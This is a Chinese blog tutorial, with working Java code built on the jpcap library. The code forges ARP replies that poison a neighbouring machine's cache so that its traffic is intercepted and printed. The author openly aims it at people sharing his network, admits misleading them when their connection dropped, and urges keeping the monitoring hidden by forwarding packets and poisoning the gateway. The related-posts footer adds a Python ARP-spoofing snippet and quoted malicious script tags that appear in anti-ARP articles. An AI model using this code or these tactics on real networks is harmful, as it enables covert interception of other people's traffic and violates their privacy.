使用JAVA通过ARP欺骗类似P2P终结者实现数据封包监听

如果说最近有什么不爽的事情,那就是与人共享网络的痛苦了,特别是当其他共享者使用那些P2P工具下载软件,而你却看着网页进度条一点点爬的时候,那种痛苦对于我这种网虫级别的人来说,那简直就是痛不欲生。绝对不能再忍了,于是乎上网下载P2P终结者,哼,你们不仁我则不义,看谁厉害。软件下好后,立刻启动监控,然后尝试了下速度,哇,那个爽啊。可惜好景不长,没多久对方就跑来问我为什么他们断网了?我楞了一下,那垃圾软件居然连对方的网都断了,于是支支唔唔的应付了他,说我看下,总算勉强过关,还好他们不懂电脑,不然就掉大了(貌视挺卑鄙的,别BS俺,俺也是迫不得已)。

没办法,那破烂软件居然连人家网都断了,我仅仅只是想给他们限速而已(还算有点良心),仔细查看了下文档,使用的方式都没问题啊,为什么会这样呢?想了半天也毫无头绪,没办法,看来只能自己动手了,于是乎上网找了些关于这方面的资料看了下,也写了一点代码做试验,由于时间有限也只写了一点,不过总体的做法大概是有所了解,在这里就写一篇文章大概记录一下自己的做法,以便作为日记又可与大众分享下。

其实目前网络上类似P2P终结者这类软件,主要都是基于ARP欺骗实现的,网络上到处都有关于ARP欺骗的介绍,不过为了本文读者不需要再去查找,我就在这里大概讲解一下。
ARP(Address Resolution Protocol)既地址解释协议,主要的目的是用于进行IP和MAC地址解释的。IP是网络层协议,而MAC是被数据链路层使用。网络中两个节点要进行通信,那么首先发送端必须要知道源和目的地的MAC地址,而网络层是使用IP地址,所以要获得MAC地址,就必须通过IP地址获取对应的MAC地址,这样就需要使用ARP协议将IP地址转换为MAC地址,而同时为了能够快速的找到目的地的MAC地址,每个节点都会有一个ARP缓存,用于保存已经转好好的MAC地址,大家可以在控制台下使用arp –a指令查看arp缓存表。

而ARP具体过程就是当需要通过IP获取一个远端的的MAC地址的时候,系统会首先检查ARP表中是否存在对应的IP地址,如果没有,则发送一个ARP广播,当某一个拥有这个MAC地址的节点收到ARP请求的时候,会创建一个ARP reply包,并发送到ARP请求的源节点,ARP Reply包中就包含了目的地节点的MAC地址,在源节点接受到这个reply后,会将目的地节点的MAC地址保存在ARP缓存表中,下一次再次请求同一IP地址的时候,系统将会从ARP表中直接获取目的地MAC地址,而不需要再次发送ARP广播。

看到这里,ARP的具体过程大概讲解了一遍,希望能够解释清楚。相信有心的朋友一定已经开始考虑ARP欺骗的原理了吧,其实就是利用ARP表进行ARP欺骗,比如一台局域网内的机器A,通过网关B进行internet连接,而它的arp表中保存着网关B的IP和MAC地址对,如下:
192.168.1.1 —> MAC1(懒得写那么长了,就以MAC1作为MAC地址了)

那么也就是说,当A想上网的时候,他所有的数据都将先发送到网关再由网关转发出去,那么A的数据首先会通过192.168.1.1找到网关的MAC地址MAC1,然后就可把数据发送到网关了。此时你的机器是C,MAC地址是MAC2,你想通过ARP欺骗来获取A传输的数据,那么你所需要做的事情其实很简单,就是将机器A的ARP表中192.168.1.1对应的MAC地址MAC1改成MAC2即可,这样子机器A所有发送到192.168.1.1的数据就会发到MAC地址为MAC2的机器上,也就是你的机器上了。

要更改APR表的记录,办法就是伪造一个ARP reply包发送给机器A,而这个ARP reply包中的源IP为192.168.1.1,MAC地址为MAC2既你的机器的MAC地址即可,机器A接受到后就会将这个源IP和MAC刷新到它的ARP缓存表中,覆盖原有的记录,最终这样就可以达到ARP欺骗的目的了。

讲到这里不知道大家是否对ARP欺骗有所了解呢?如果再不了解那就上网搜搜吧,网上很多相关的资料。好了,原理讲完了,那就轮到实现了,通过JAVA又如何实现ARP欺骗呢?
从头到尾来做,当然不是我的作风,JAVA社区那么庞大,我么应该好好利用,要站在巨人的肩膀上成功嘛,呵呵。有一个开源项目JPCAP,这个项目提供一个中间层接口让使用者可以调用如wincap/libpcap这些库对网络传输进行控制,具体可到官方网站查看其文档。

在这里,我实现了一个简单的封包截取程序,根据ARP欺骗的原理,我们所需要做的事情如下
1、构建一个ARP Reply包
2、将该封包发送到需要欺骗的机器

代码如下:


代码如下:

public class LocalListener {
private final static String GATE_IP = "192.168.11.1";
private final static byte[] GATE_MAC = {0x00, 0x0a, (byte) 0xc5, 0x42, 0x6e, (byte) 0x9a};
private JpcapCaptor jpcap; //与设备的连接
private JpcapSender sender; //用于发送的实例
private Packet replyPacket; //ARP reply包
private NetworkInterface device; //当前机器网卡设备
private IpMacMap targetIpMacMap; //目的地IP MAC对
public LocalListener(IpMacMap target) throws Exception {
NetworkInterface[] devices = JpcapCaptor.getDeviceList(); device = devices[1];
this.targetIpMacMap = target;
initSender();
initPacket();
}
private void initSender() throws Exception {
jpcap = JpcapCaptor.openDevice(device, 2000, false, 10000); //打开与设备的连接
jpcap.setFilter("ip", true); //只监听ip数据包
sender = jpcap.getJpcapSenderInstance();
}
private void initPacket() throws Exception {
//reply包的源IP和MAC地址,此IP-MAC对将会被映射到ARP表
IpMacMap targetsSd = new IpMacMap(GATE_IP, device.mac_address);
//创建修改目标机器ARP的包
replyPacket = ARPPacketGern.genPacket(targetIpMacMap, targetsSd);
//创建以太网头信息,并打包进reply包
replyPacket.datalink = EthernetPacketGern.genPacket(targetIpMacMap.getMac(),
device.mac_address);
}
public void listen() throws InterruptedException{
Thread t = new Thread(new Runnable() {
public void run() {
//发送reply封包,修改目的地arp表, arp表会在一段时间内被更新,所以需要不停发送
while(true){
send();
try {
Thread.sleep(500);
} catch (InterruptedException ex) {
Logger.getLogger(LocalListener.class.getName()).log(Level.SEVERE, null, ex);
}
}
}
});
t.start();
//截获当前网络设备的封包收发信息
while(true){
IPPacket ipPacket = (IPPacket)jpcap.getPacket();
System.out.println(ipPacket);
}
}}

//IP-MAC实体,只用于保存一对IP-MAC地址
public class IpMacMap {
private String ip;
private byte[] mac;
public IpMacMap(){
}
public IpMacMap(String ip, byte[] mac){
this.ip = ip;
this.mac = mac;
}
public String getIp() {
return ip;
}
public void setIp(String ip) {
this.ip = ip;
}
public byte[] getMac() {
return mac;
}
public void setMac(byte[] mac) {
this.mac = mac;
}
}
//ARP reply包生成类,用于根据目的地址和源地址生成reply包
public class ARPPacketGern{
public static ARPPacket genPacket(IpMacMap target, IpMacMap sender) throws Exception{
ARPPacket arpTarget = new ARPPacket();
arpTarget.hardtype = ARPPacket.HARDTYPE_ETHER; //选择以太网类型(Ethernet)
arpTarget.prototype = ARPPacket.PROTOTYPE_IP; //选择IP网络协议类型
arpTarget.operation = ARPPacket.ARP_REPLY; //选择REPLY类型
arpTarget.hlen = 6; //MAC地址长度固定6个字节
arpTarget.plen = 4; //IP地址长度固定4个字节
arpTarget.target_hardaddr = target.getMac();
arpTarget.target_protoaddr = InetAddress.getByName(target.getIp()).getAddress();
arpTarget.sender_hardaddr = sender.getMac();
arpTarget.sender_protoaddr = InetAddress.getByName(sender.getIp()).getAddress();
return arpTarget;
}
}

//根据目的地MAC和源MAC构建以太网头信息,用于传输数据
public class EthernetPacketGern{
public static EthernetPacket genPacket(byte[] targetMac, byte[] senderMac) throws Exception {
EthernetPacket ethToTarget = new EthernetPacket(); //创建一个以太网头
ethToTarget.frametype = EthernetPacket.ETHERTYPE_ARP; //选择以太包类型
ethToTarget.dst_mac = targetMac;
ethToTarget.src_mac = senderMac;
return ethToTarget;
}
}

如上代码实现了创建一个发送到IP为192.168.11.4的机器的ARP reply封包,其中可看到,reply包中的源IP为192.168.11.1,而源MAC则被改成当前机器的MAC地址,既device.mac_address,这样当192.168.11.4的机器接收到该reply包后,就会刷新ARP表,并且所有发送往192.168.11.1的数据都会实际发送到当前运行该程序的机器。程序中创建了一个线程用于循环发送reply封包,主要是因为ARP表会在一定时间内更新,所以要不停的发送才能保证其MAC地址时刻都是被改变的。同时主线程用于监听并打印当前设备的所有IP数据包信息,本来此方法只能监听到本机数据包的信息,但由于使用了ARP欺骗,所以你会在192.168.11.4发送数据到192.168.11.1的时候截获其数据包,并看到类似如下的信息:

1216798614:885583 /192.168.11.4->/61.135.189.33 protocol(6) priority(0) hop(128) offset(0) ident(34922) TCP 1337 > 8016 seq(1062321893) win(65535) S
其实上例程序虽然可以截获并监听192.168.11.4的数据包,但是如果真的运行起来后,192.168.11.4的机器将会无法上网(假设该机器通过192.168.11.1作为网关上网),这又是为何呢?
这就是因为本机截获了192.168.11.4的封包,但是却没有将封包转发出去,所以实际上数据包到了你的机器上后就被中断了,数据包无法发送出去。既然要监听对方机器,当然不能让对方知道啦,如果你监听了那台机器,却导致对方无法上网,傻子也知道有问题啦,所以以上程序仍然要加个补充,那就是将封包数据在转发到192.168.11.1上,只要将截获的封包再send出去就可以了,具体如何做就留给大家想吧,困了,休息了,如果有朋友有兴趣又实在想不出如何做的话,可以向我提出来,有必要的话,下次再贴一个完整点的例子吧。

对了,最后还有补充的地方,那就是我们可以通过同样的方式刷新网关的ARP,这样网关接受到的数据也会被本机截获,同样再通过本机转发到目的机器即可。这样对方既可正常上网,而我们又可截获对方的数据包,如果要进行限速的话,那就是在截获封包的同时,进行一定的延时,比如一秒只允许多少K的数据通过,都可以在这里做手脚,同样的,具体如何留给大家想吧,^ o ^。

(0)

相关推荐

  • java开发gui教程之jframe监听窗体大小变化事件和jframe创建窗体

    复制代码 代码如下: import java.awt.event.WindowEvent;import java.awt.event.WindowStateListener; import javax.swing.JFrame; public class WinFrame extends JFrame { public WinFrame(){  this.setName("Window 窗口状态");  this.setSize(300,300);  this.setDefaultCl

  • JSP监听器用法分析

    本文实例讲述了JSP监听器用法.分享给大家供大家参考,具体如下: 监听器也叫Listener,是servlet服务的监听器.它可以监听客户端的请求,服务端的操作等.比如统计在线用户数量.每当增加一个HttpSession时,就会触发sessionCreate(HttpSessionEvent se)方法,这样就可以给在线人数加1.常用的监听器接口如下: 1. ServletContextAttributeListener监听对ServletContext属性的操作.比如增加,删除,修改属性. 2

  • JSP中用回车监听按钮事件兼容火狐 IE等主流浏览器

    复制代码 代码如下: <script> // 兼容FF document.onkeydown=keyListener; function keyListener(e){ e = e ? e : event; if(e.keyCode == 13){ onsubmit(); } } </script>

  • 浅析JAVA中过滤器、监听器、拦截器的区别

    1.过滤器:所谓过滤器顾名思义是用来过滤的,在java web中,你传入的request,response提前过滤掉一些信息,或者提前设置一些参数,然后再传入servlet或者struts的action进行业务逻辑,比如过滤掉非法url(不是login.do的地址请求,如果用户没有登陆都过滤掉),或者在传入servlet或者struts的action前统一设置字符集,或者去除掉一些非法字符(聊天室经常用到的,一些骂人的话).filter 流程是线性的, url传来之后,检查之后,可保持原来的流程

  • 利用java监听器实现在线人数统计

    1.在工程中创建监听类SessionListener 并且实现HttpSessionListener接口,代码如下 import javax.servlet.http.HttpSessionEvent; import javax.servlet.http.HttpSessionListener; public class SessionListener implements HttpSessionListener { private static int count = 0; public vo

  • Java添加事件监听的四种方法代码实例

    Java添加事件的几种方式(转载了codebrother的文章,做了稍微的改动): /** * Java事件监听处理--自身类实现ActionListener接口,作为事件监听器 * * @author codebrother */ class EventListener1 extends JFrame implements ActionListener { private JButton btBlue, btDialog; public EventListener1() { setTitle(

  • java实现监听u盘示例分享

    复制代码 代码如下: package org.load.u; import java.io.File;import java.util.LinkedHashMap;import java.util.Map; // U盘检测public class CheckU { // 存放磁盘状态 private static Map<String, Boolean> map = new LinkedHashMap<String, Boolean>(); // 定义磁盘 private stat

  • 使用JAVA通过ARP欺骗类似P2P终结者实现数据封包监听

    如果说最近有什么不爽的事情,那就是与人共享网络的痛苦了,特别是当其他共享者使用那些P2P工具下载软件,而你却看着网页进度条一点点爬的时候,那种痛苦对于我这种网虫级别的人来说,那简直就是痛不欲生.绝对不能再忍了,于是乎上网下载P2P终结者,哼,你们不仁我则不义,看谁厉害.软件下好后,立刻启动监控,然后尝试了下速度,哇,那个爽啊.可惜好景不长,没多久对方就跑来问我为什么他们断网了?我楞了一下,那垃圾软件居然连对方的网都断了,于是支支唔唔的应付了他,说我看下,总算勉强过关,还好他们不懂电脑,不然就掉大

  • Java实现监听文件变化的三种方案详解

    目录 背景 方案一:定时任务 + File#lastModified 方案二:WatchService 方案三:Apache Commons-IO 小结 背景 在研究规则引擎时,如果规则以文件的形式存储,那么就需要监听指定的目录或文件来感知规则是否变化,进而进行加载.当然,在其他业务场景下,比如想实现配置文件的动态加载.日志文件的监听.FTP文件变动监听等都会遇到类似的场景. 本文给大家提供三种解决方案,并分析其中的利弊,建议收藏,以备不时之需. 方案一:定时任务 + File#lastModi

  • 服务器的ARP欺骗攻击的防范的两种解决方法

    服务器的ARP欺骗攻击的防范          这些天我的服务器几乎天天都被人ARP欺骗攻击,网页被挂木马,实在烦死了,深圳的龙岗电信机房实在是够恶心的,不得已,我只好寻找一些防范ARP攻击的方法,目前发现可以使用静态地址法和使用专用软件的方法来防范ARP欺骗攻击. 静态地址法指的是,在本地服务器上,将路由器的MAC地址设置为静态的方式来阻止别人对我的ARP攻击,如果你也越到了类似的ARP欺骗攻击,也可以参考这个方法进行设置. 首先,找到路由器真实的MAC地址,在没有被攻击的条件下,输入命令ar

  • python使用arp欺骗伪造网关的方法

    本文实例讲述了python使用arp欺骗伪造网关的方法.分享给大家供大家参考.具体实现方法如下: #coding:utf-8 ''' arp欺骗局域网pc,将伪造的网关mac以网关的arp应答发送给pc ''' from scapy.all import ARP,send,arping import sys,re stdout=sys.stdout IPADDR="192.168.1.*" gateway_ip='192.168.1.1' #伪造网关mac地址 gateway_hw='

  • 解决http://16a.us/2.js之arp欺骗的方法附专杀工具

    公司局域网访问所有页面都加上了<script src=http://16a.us/2.js></script>代码, 这次是客户端打开的所有网页,故可排除是服务器环境遭遇arp欺骗,综合网上各方意见,得出结论:本地网关或dns被劫持,修复本地连接后故障消除. 根本解决方法,绑定网关mac地址,方法为: 命令行输入arp -s 网关IP 网关MAC 关于网关MAC,可使用arp命令查询. 如果是dns被劫持,则更改dns服务器. 关于js加密解密的两篇文章,想研究上面病毒脚本的朋友可

  • arp欺骗的原理介绍与什么是ARP和防范ARP欺骗第1/3页

    什么是ARP?如何防范ARP欺骗技术? 什么是ARP?如何防范ARP欺骗技术? 首先说一下什么是ARP.如果你在UNIX Shell下输入 arp -a (9x下也是),你的输出看起来应该是这样的: Interface: xxx.xxx.xxx.xxx Internet Address Physical Address Type xxx.xxx.xxx.xxx 00-00-93-64-48-d2 dynamic xxx.xxx.xxx.xxx 00-00-b4-52-43-10 dynamic

  • 网站被黑的假象--ARP欺骗之页面中加入一段js

    昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码.刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹. <script src=http://fuck.ns2go.com/dir/index_pic/1.js></script> 于是只能从这段代码入手,我下载这个js开发发现是下面一段代码: 复制代码 代码如下: window["\x64\x6f\x63\x75\x6d\x65\x6e\x

  • 服务器遭受arp欺骗的解决方法 原创

    为了让大家跟我们一样以后免受arp攻击之苦,我们特给大家准备了下面的文章. 1.arp欺骗不论是局域网也好,还是我们的服务器内网也好,其实都是一样的,无外乎ip是内网还是外网的,都可以安装360的arp防火墙,不论是反追踪还是防御都是不错的,之前我们安装了antiarp的防火墙感觉终于被攻击到停止防御.这里并不是说antiarp防火墙不好只是在一些超大规模的攻击,antiarp容易挂掉.大家可以根据需要安装. 2.服务器最好arp绑定下. 复制代码 代码如下: if exist ipconfig

  • 局域网遭遇ARP欺骗攻击的解决方法

    该病毒发作时症状表现为: 1)计算机网络连接正常,但无法上网或者时通时断,经常掉线: 2)用户私密信息(如QQ.网游等帐号)被窃取: 3)局域网内出现网络拥塞,甚至造成一些网络设备当机: 基本概念: 为了能够说明问题,有必要先来介绍一些基本概念,知者略过. 首先来说IP地址,大家应该都很熟悉了,我们知道,IP地址是一段32位(二进制)的无符号整数,例如:192.168.110.1,其最基本的作用就是在(IP)网络中唯一标识一台特定的主机.在Internet上,我们正是凭借IP地址来定位其他主机或

  • 网站源文件被注入了&lt;iframe&gt;代码—ARP欺骗的木马病毒攻击

    最近我的网站突然出现访问的迟钝,并且打开之后杀毒软件立即提示含有木马病毒. 我就很纳闷,运行了4年的网站一直都好好的最近怎么出现病毒提示呢.职业习惯原因打开了网站的源代码查看,原来在网页源代码的头部被加入了<iframe>嵌套框架网页,该网页执行木马程序-- 按照常理我心中一寒:估计是服务器被人攻陷了,所有文件代码被加了此行代码,于是FTP上去,下载文件下来查看却没有该代码. 于是询问服务器管理员含笑,他一听就说:"是中ARP欺骗的病毒攻击了". 那么什么是"AR

随机推荐